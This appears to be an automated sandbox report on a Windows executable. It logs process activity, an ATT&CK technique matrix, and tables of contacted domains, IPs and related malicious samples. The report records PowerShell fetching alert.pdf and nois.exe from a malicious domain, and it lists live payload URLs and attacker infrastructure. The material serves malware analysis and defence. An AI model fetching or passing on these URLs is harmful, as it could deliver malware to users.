Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4839
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5002
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5041
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7312 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4580 | Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4680 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: powershell.exe, 00000001.00000002.1504426551.0000024FEBD0B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: svchost.exe, 00000006.00000002.2611740232.000001EC4A42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2613071235.000001EC4FA58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000D.00000002.1631353048.0000022EBA349000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
MITRE ATT&CK Matrix (rebuilt from the flattened report table; a leading number is the report's hit count for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 PowerShell; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 21 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1570132 | Sample: lg1wwLsmCX.exe | Start date: 06/12/2024 | Architecture: WINDOWS | Score: 52
Contacted domains: badlarrysguitars.com, x1.i.lencr.org, bg.microsoft.map.fastly.net
Sample-level signatures: Machine Learning detection for sample; AI detected suspicious sample
Process tree (from the behavior graph):
  lg1wwLsmCX.exe (signature: Suspicious powershell command line found)
    powershell.exe -> badlarrysguitars.com 101.99.75.174, port 443, source ports 49718, 49768 (SHINJIRU-MY-AS-AP Shinjiru Technology Sdn Bhd, Malaysia)
      Acrobat.exe
        AcroCEF.exe
          AcroCEF.exe -> 50.16.47.176, port 443, source ports 49758, 49767 (AMAZON-AES, United States)
      conhost.exe
    powershell.exe
      conhost.exe
  svchost.exe -> 127.0.0.1

Initial Sample
Source | Detection | Scanner | Label
lg1wwLsmCX.exe | 8% | ReversingLabs |
lg1wwLsmCX.exe | 100% | Joe Sandbox ML |
Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches
URLs
Source | Detection | Scanner | Label
https://badlarrysguitars.com/share/alert.pdfll | 0% | Avira URL Cloud | safe
https://www.adobe.co | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path( | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/share/alert.pdf | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/private/nois.exej | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path( | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/private/nois.exe | 0% | Avira URL Cloud | safe
https://go.microsoft.co | 0% | Avira URL Cloud | safe
http://badlarrysguitars.com | 0% | Avira URL Cloud | safe
http://www.microsoft.coc | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/pri | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
badlarrysguitars.com | 101.99.75.174 | true | true | | unknown
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://badlarrysguitars.com/share/alert.pdf | true | Avira URL Cloud: safe | unknown
https://badlarrysguitars.com/private/nois.exe | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1493599643.0000024F901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1419880884.0000024F819F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1493599643.0000024F90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB21F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.5.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.microsoft.co | powershell.exe, 00000001.00000002.1504426551.0000024FEBD0B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000002.1419880884.0000024F81193000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3641000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://badlarrysguitars.com/share/alert.pdfll | powershell.exe, 00000001.00000002.1506677308.0000024FEBF5E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000006.00000002.2613139359.000001EC4FA8C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://badlarrysguitars.com/private/nois.exej | powershell.exe, 0000000D.00000002.1559532601.0000022EA02D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path( | powershell.exe, 0000000D.00000002.1559532601.0000022EA0250000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1632473413.0000022EBA4B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1629139480.0000022EBA260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1560571180.0000022EA04E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561049909.0000022EA1C90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path( | powershell.exe, 00000001.00000002.1501054711.0000024FE9CC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1502637123.0000024FE9F50000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://badlarrysguitars.com | powershell.exe, 00000001.00000002.1419880884.0000024F8169C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3818000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://www.adobe.co | ReaderMessages.4.dr | false | Avira URL Cloud: safe | unknown
http://badlarrysguitars.com | powershell.exe, 00000001.00000002.1419880884.0000024F8192E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3AAB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://badlarrysguitars.com/pri | powershell.exe, 0000000D.00000002.1561850216.0000022EA3AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3C09000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod-C: | edb.log.6.dr | false | | high
https://contoso.com/ | powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2-C: | svchost.exe, 00000006.00000003.1430730460.000001EC4FC00000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1493599643.0000024F901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1419880884.0000024F819F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1493599643.0000024F90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB21F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1419880884.0000024F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA2181000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1419880884.0000024F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA2181000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.coc | powershell.exe, 00000001.00000002.1506355445.0000024FEBE70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
50.16.47.176 | unknown | United States | 14618 | AMAZON-AESUS | false
101.99.75.174 | badlarrysguitars.com | Malaysia | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | true
Private IPs:
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1570132
Start date and time: 2024-12-06 15:45:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: lg1wwLsmCX.exe (renamed because the original name is a hash value)
Original Sample Name: aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9.exe
Detection: MAL
Classification: mal52.winEXE@23/63@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 9
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 162.159.61.3, 172.64.41.3, 23.218.208.137, 23.218.208.109, 23.195.39.65, 199.232.210.172, 2.19.198.27, 23.32.239.56, 2.20.40.170, 2.19.126.143, 2.19.126.149, 23.193.114.8, 23.193.114.34, 2.20.68.201, 2.20.68.210
• Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
• Execution Graph export aborted for target lg1wwLsmCX.exe, PID 7660 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1912 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7676 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: lg1wwLsmCX.exe
Time | Type | Description
09:46:31 | API Interceptor | 63x Sleep call for process: powershell.exe modified
09:46:36 | API Interceptor | 2x Sleep call for process: svchost.exe modified
09:46:46 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
IPs
Match | Associated Sample Name / URL | Detection | Threat Name
50.16.47.176 | phish_alert_sp2_2.0.0.0.eml | malicious | Unknown
 | Belegdetails Nr378-938-027181-PDF.html | malicious | WinSearchAbuse
 | Job Description.lnk (2).download.lnk | malicious | Ducktail
 | FACTURE NON PAYEE.pdf | malicious | Unknown
 | Notice_Of_New_Remittance.pdf | malicious | Unknown
 | Settlement_Legal_Transcription.pdf | malicious | HTMLPhisher
 | https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12 | malicious | HTMLPhisher
 | REMITTANCE-NOTICE-For-Norriselectricxslx.pdf | malicious | Unknown
 | 2855dffd-7888-4713-9478-2bbfa22fab70.eml | malicious | Unknown
 | LisectAVT_2403002B_218.exe | malicious | Unknown
101.99.75.174 | IFhqcKaIol.lnk | malicious | Unknown
Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
badlarrysguitars.com | IFhqcKaIol.lnk | malicious | Unknown | 101.99.75.174
bg.microsoft.map.fastly.net | IFhqcKaIol.lnk | malicious | Unknown | 199.232.214.172
 | 17334905466c073176eadfc4a4d1af620c5aa97d12d1156570ede93d276f9fa6d51fffb6c5778.dat-decoded.exe | malicious | AsyncRAT | 199.232.210.172
 | phish_alert_sp2_2.0.0.0.eml | malicious | Unknown | 199.232.210.172
 | 1733479268d0423578683b481c87d2b90a74213612e8837faf7f066c8e81ec92f9b2658c65965.dat-decoded.exe | malicious | AsyncRAT, VenomRAT | 199.232.210.172
 | 1733479274b6398afce8a86557af12b8f232b1cc4638f7df1d6de31554c2e013c23277a5b9785.dat-decoded.exe | malicious | PureCrypter | 199.232.214.172
 | mjf2ERXdI5.exe | malicious | Unknown | 199.232.210.172
 | 16547.js | malicious | MassLogger RAT | 199.232.214.172
 | Scan_03774843.pdf | malicious | Unknown | 199.232.210.172
 | dtkB4s3lqj.lnk | malicious | Unknown | 199.232.210.172
 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, Vidar | 199.232.214.172
s-part-0035.t-0009.t-msedge.net | https://dsbemcm.r.us-east-1.awstrack.me/L0/https:%2F%2Fmondialrelay-fr.pdfing.ai%2F/1/0100019399661370-1ce77c65-1b81-4233-8a20-5a39fd0f0317-000000/J1Yr9vKfHbZhazSj6gj8UC7ow80=403 | malicious | Unknown | 13.107.246.63
 | x6r8nO2qzQ.dll | malicious | Unknown | 13.107.246.63
 | kLSN6eFPVL.exe | malicious | Unknown | 13.107.246.63
 | #U25b6#Ufe0fPlayVoiceMessage9266.eml | malicious | Unknown | 13.107.246.63
 | file.exe | malicious | LummaC Stealer | 13.107.246.63
 | 1733490739e5e30edcf0680d8a10de07d13f0f9a2284bc87bf8b4af988e0742c1432ac615d942.dat-decoded.exe | malicious | Njrat | 13.107.246.63
 | 17334905466c073176eadfc4a4d1af620c5aa97d12d1156570ede93d276f9fa6d51fffb6c5778.dat-decoded.exe | malicious | AsyncRAT | 13.107.246.63
 | https://jet.cloudhostingworks.com/CetQr/ | malicious | HTMLPhisher | 13.107.246.63
 | Document_PDF.vbs | malicious | FormBook | 13.107.246.63
 | 8AbMCL2dxM.exe | malicious | RCRU64, TrojanRansom | 13.107.246.63
ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | IFhqcKaIol.lnk | malicious | Unknown | 101.99.75.174
 | Scan_03774843.pdf | malicious | Unknown | 101.99.77.51
 | https://oyatsu-jikan.org/#Z2FyeXRocm93JG5hdGlvbmFsdHViZXN1cHBseS5jb20= | malicious | Outlook Phishing, HTMLPhisher | 101.99.88.67
 | 442.docx.exe | malicious | RMSRemoteAdmin | 111.90.147.125
 | 442.docx.exe | malicious | RMSRemoteAdmin | 111.90.147.125
 | 442.docx.exe | malicious | RMSRemoteAdmin | 111.90.147.125
 | 442.docx.exe | malicious | RMSRemoteAdmin | 111.90.147.125
 | Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msg | malicious | HTMLPhisher | 101.99.75.104
 | http://amz-account-unlock-dashboard4.duckdns.org | malicious | Unknown | 111.90.149.151
 | https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg== | malicious | Unknown | 111.90.141.53
AMAZON-AESUS | https://dsbemcm.r.us-east-1.awstrack.me/L0/https:%2F%2Fmondialrelay-fr.pdfing.ai%2F/1/0100019399661370-1ce77c65-1b81-4233-8a20-5a39fd0f0317-000000/J1Yr9vKfHbZhazSj6gj8UC7ow80=403 | malicious | Unknown | 3.232.156.127
 | IFhqcKaIol.lnk | malicious | Unknown | 3.219.243.226
 | jew.sh4.elf | malicious | Unknown | 44.221.131.20
